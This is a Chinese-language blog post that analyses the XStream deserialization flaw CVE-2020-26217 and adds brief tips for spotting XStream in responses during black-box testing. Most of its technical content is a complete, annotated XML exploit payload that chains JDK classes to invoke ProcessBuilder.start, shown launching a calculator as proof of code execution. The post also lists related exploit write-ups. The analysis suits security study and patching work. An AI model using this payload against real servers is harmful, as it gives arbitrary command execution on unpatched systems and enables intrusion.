Xstream反序列化漏洞

于 2024-08-08 18:50:50 发布
阅读量568 收藏 2
点赞数 19
文章标签: 网络 安全 网络攻击模型 安全威胁分析
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_50296568/article/details/141020709
版权

文章目录

Xstream反序列化漏洞

XStream是一个Java库,用于将Java对象序列化为XML格式,也可以将XML格式的数据反序列化为Java对象。它是一个流行的开源库,常用于在分布式系统中传输和存储数据。

漏洞原因

Xstream库中部分类本身会做反射的 invoke()、序列化的 resovleClass()、readObject()等等,同时这些类的这些操作有被攻击者恶意利用的危险。例如CVE-2020-26217中我们可以通过构造一个包含恶意XML的类。

漏洞POC分析

POC如下:

<map>  //构建map ,用于进入MapConverter类里面的putCurrentEntryIntoMap函数
  <entry>  //构建键值对的对应的key值 ,存在key值就会调用NativeString.hashCode()
    <jdk.nashorn.internal.objects.NativeString>  //通过引用NativeString方法,进入到NativeString的hashCode()函数,进而进入到getStringValue()函数通过toString()方法返回对象类型
      <flags>0</flags>
      <value class='com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data'>  //表示一个值,其类型为Base64Data,因为toString()方法里面的Value值是Base64Data类型。
        <dataHandler>
          <dataSource class='com.sun.xml.internal.ws.encoding.xml.XMLMessage$XmlDataSource'> //赋值DataSource,为后续readFrom方法的写入值
            <contentType>text/plain</contentType>
            <is class='java.io.SequenceInputStream'>//调用SequenceInputStream,写入DataSource,对应ReadFrom调用SequenceInputStream#read传入的SequenceInputStream对象
              <e class='javax.swing.MultiUIDefaults$MultiUIDefaultsEnumerator'>//调用MultiUIDefaults里面的MultiUIDefaultsEnumerator,对应read方法调用的SequenceInputStream#nextStream的传入的MultiUIDefaultsEnumerator对象
                <iterator class='javax.imageio.spi.FilterIterator'>//描述了一个迭代器,被用来在迭代器遍历过程中触发特定的行为(即启动进程)。FilterIterator和ContainsFilter的使用是为了找到type是KEYS,iterator为FilterIterator(这里是java.lang.ProcessBuilder的start方法)的元素,并执行。得以进入nextElement的判断
                  <iter class='java.util.ArrayList$Itr'>//调用ArrayList的Itr方法
                    <cursor>0</cursor>//过ArrayListItr#next的i>=size判断
                    <lastRet>-1</lastRet>
                    <expectedModCount>1</expectedModCount>
                    <outer-class>//迭代器遍历过程中启动一个进程
                      <java.lang.ProcessBuilder> //这是Java中用于创建操作系统进程的类
                        <command>
                          <string>calc</string> //进程打开计算器
                        </command>
                      </java.lang.ProcessBuilder>
                    </outer-class>
                  </iter>
                  <filter class='javax.imageio.ImageIO$ContainsFilter'>//调用ContainsFilter#filter方法执行invoke.(processbuilder)
                    <method>//method是ProcessBuilder.start
                      <class>java.lang.ProcessBuilder</class>
                      <name>start</name>
                      <parameter-types/>
                    </method>
                    <name>start</name>
                  </filter>
                  <next/>
                </iterator>
                <type>KEYS</type> //nextElement的判断条件
              </e>
              <in class='java.io.ByteArrayInputStream'> //调用ByteArrayInputStreama对应get方法调用的ByteArrayOutputStreamEx#readFrom的dataSource输入
                <buf></buf>
                <pos>0</pos>
                <mark>0</mark>
                <count>0</count>
              </in>
            </is>
            <consumed>false</consumed>
          </dataSource>
          <transferFlavors/>
        </dataHandler>
        <dataLen>0</dataLen>
      </value>
    </jdk.nashorn.internal.objects.NativeString>
    <string>test</string> //键值对的value值
  </entry>
</map>

黑盒测试漏洞

响应报文中可能包含以下XStream相关的标识或特征:

  1. XML报文:XStream是一个用于序列化Java对象为XML格式的库,因此响应中可能包含XML格式的数据。
  2. 标签名称和属性:XStream将Java对象的类名作为XML标签名称,并使用对象的属性作为XML标签的属性。
  3. XML命名空间:如果在XStream序列化过程中设置了命名空间,响应中可能会包含命名空间相关的标识或特征。
  4. 特殊字符转义:XStream会对特殊字符进行转义,比如将<转义为<,>转义为>等。因此,响应中可能会包含转义后的特殊字符。
  5. 类型适配器:XStream可以自定义类型适配器来处理特定类型的对象序列化和反序列化。响应中可能会包含自定义类型适配器相关的标识或特征。
  6. 多态类型:XStream支持多态类型的序列化和反序列化。如果响应中包含多态类型的对象,可能会有相关的标识或特征。
    需要注意的是,XStream的具体使用方式和配置可能因应用程序而异,因此具体的标识或特征可能会有所差异。以上列举的只是一些常见的情况。
B1ackMa9ic
关注
  • 19
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
XStream 反序列化漏洞 (CVE-2020-26258 & 26259) 的复现与分析
smellycat000的专栏
12-16 3687
聚焦源代码安全,网罗国内外最新资讯!Xstream 是 Java 类库,用来将对象序列化成 XML (JSON) 或反序列化为对象。XStream 是一款开源软件,允许在 BSD 许可...
rmi 反序列化漏洞_反序列化漏洞整理
weixin_36123285的博客
12-23 398
群里总有人问反序列漏洞是啥啊,学不明白啊,从来没听明白过, 面试有人问,闲聊也有人问;1个月前有人问,1个月后还有人在问今天就来整理一下个人对反序列化漏洞理解和这个洞涉及的一些知识点各种语言都有反序列化漏洞序列化即将对象转化为字节流,便于保存在文件,内存,数据库中;反序列化即将字节流转化为对象也就是把数据转化为一种可逆的数据结构,再把这种可逆的数据结构转化回数据,这就是序列化与反序列化看到过一个通...
xstream 反序列化漏洞研究与修复
你和萤火虫有两个共同点,在我的眼里都会发光,同时,都已经很多年没见了
03-17 4885
文章目录1、简介2、举例3、漏洞4、修复 1、简介 xstream是一个用于序列化和反序列化的java库,主要是java对象和xml之间相互转换。 XStream反序列化同fastjson这种不一样的地方是fastjson会在反序列化的时候主动去调用getters和setters,而XStream反序列化过程中赋值都有Java的反射机制来完成,所以并没有这样主动调用的特性。 特点 使用方便 - XStream的API提供了一个高层次外观,以简化常用的用例 无需创建映射 - XStream的API提供了默
XStream反序列化漏洞分析
weixin_44825990的博客
11-25 1726
XStream反序列化漏洞分析
XStream反序列化漏洞分析
weixin_44825990的博客
12-13 719
XStream反序列化流程及CVE-2020-26217漏洞分析
Jenkins cve-2016-0792 漏洞复现 Xstream 反序列化漏洞
whatday的专栏
07-19 1071
环境搭建 首先需要安装jenkins,这里使用的是1.642.1版本,其他版本可以自行下载,在官网和百度一开始都是没找到的,包括看了其他人的分析,但是都没有找到环境搭建,大部分是直接复现和poc分析 下载链接 http://archives.jenkins-ci.org/war-stable/1.642.1/jenkins.war 这里需要在本地配置java环境,具体方法这里不在介绍,我复现使用的是java8 java -jar jenkins.war --httpPort=8080 htt.
Jenkins-CVE-2016-0792漏洞复现(Xstream 反序列化漏洞
whojoe的博客
06-04 4706
Jenkins-CVE-2016-0792漏洞复现(Xstream 反序列化漏洞)环境搭建漏洞复现环境清理参考文章 环境搭建 首先需要安装jenkins,这里使用的是1.642.1版本,其他版本可以自行下载,在官网和百度一开始都是没找到的,包括看了其他人的分析,但是都没有找到环境搭建,大部分是直接复现和poc分析 下载链接 http://archives.jenkins-ci.org/war-stable/1.642.1/jenkins.war 这里需要在本地配置java环境,具体方法这里不在介绍,我复现
java xstream组件反序列化漏洞复现
Shanfenglan's blog
12-16 2506
文章目录前言1. CVE-2021-213511.1 利用2. CVE-2021-295052.1 利用 前言 XStream是一个轻量级、简单易用的开源Java类库,它主要用于将对象序列化成XML(JSON)或反序列化为对象。 XStream 在解析XML文本时使用黑名单机制来防御反序列化漏洞,但是其 1.4.15 及之前版本黑名单存在缺陷,攻击者可利用javax.naming.ldap.Rdn_-RdnEntry及javax.sql.rowset.BaseRowSet构造JNDI注入,进而执行任意命令。
XStream反序列化漏洞(cve-2020-26258/cve-2020-26259)
chaojixiaojingang
12-17 3600
1.漏洞描述 XStream是一个常用的Java对象和XML相互转换的工具。在运行XSteam的服务上,未授权的远程攻击者通过构造特定的序列化数据 ,可造成任意文件删除/服务端请求伪造(SSRF) 。 2.影响版本 XStream <= 1.4.14 3.漏洞POC 1)cve-2020-26259:任意文件删除 import com.thoughtworks.xstream.XStream; /* CVE-2020-26259: XStream is vulnerab...
基于 Java 的亿赛通电子文档安全管理系统XStream反序列化漏洞任意文件上传利用
07-01
【作品名称】:基于 Java 的亿赛通电子文档安全管理系统XStream反序列化漏洞任意文件上传利用 【适用人群】:适用于希望学习不同技术领域的小白或进阶学习者。可作为毕设项目、课程设计、大作业、工程实训或初期...
亿赛通电子文档安全管理系统XStream反序列化漏洞任意文件上传利用.zip
06-23
2、本项目适合计算机相关专业(如计科、人工智能、通信工程、自动化、电子信息等)的在校学生、老师或者企业员工下载学习,也适合小白学习进阶,当然也可作为毕设项目、课程设计、作业、项目初期立项演示等。...
XStream1.4.16反序列化漏洞(CVE-2020-26258、CVE-2020-26259)
05-08
近日XStream官方发布安全更新,修复了XStream 反序列化漏洞(CVE-2020-26258、CVE-2020-26259)。攻击者通过构造恶意的XML文档,可绕过XStream的黑名单,触发反序列化,从而造成CVE-2020-26258 SSRF漏洞,以及 CVE-...
xstream序列化与反序列化
06-07
xstream中xml与javaBean的互转
xstream-1.4.15.jar
01-28
XStream 反序列化漏洞(CVE-2020-26258 & 26259),修复jar包 xstream-1.4.15.jar Xstream 是 Java 类库,用来将对象序列化成 XML (JSON) 或反序列化为对象。XStream 是一款开源软件,允许在 BSD 许可证的许可下分发...
J031_使用TCP协议支持与多个客户端同时通信
lzn20161229的博客
08-03 452
使用TCP协议支持与多个客户端同时通信。
如何计算UDP校验和
最新发布
ZhongUncle的博客
08-07 639
在了解 UDP 校验和的时候,发现资料很少,如果看教材的话,一定看到过下面这两张图,但是又看不懂,加上解释之后也难懂:本文先说具体怎么算的,再说一些细节,过程中顺带解释一下这两个图(第一张图是布局情况,第二张图是解释如何计算的)。
【Vulnhub系列】Vulnhub Connect-The-Dots 靶场渗透(原创)
Lusen的博客
08-02 603
Vulnhub系列Connect-The-Dots靶场做题记录
如何提前预防网络威胁
dexun123的博客
08-06 634
这场攻击规模空前,据官方数据,受影响的服务器数量飙升至3800余台,波及范围广泛,尤以美、加、法、德等国的企业为重灾区。态势感知,作为一种根植于环境、动态且全局性的安全风险洞察能力,其核心在于运用安全大数据的浩瀚资源,从宏观视角深化对安全威胁的发现、理解、分析及响应能力,最终引领至精准的安全决策与行动。态势感知强调对网络安全态势的全方位、实时、动态监控与评估,旨在于攻击链条的每一个细微环节捕捉异常,无论是情报搜集的微妙动作,还是攻击尝试的初步试探,乃至数据窃取与情报回传的隐蔽行动,都难逃其敏锐的“法眼”。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值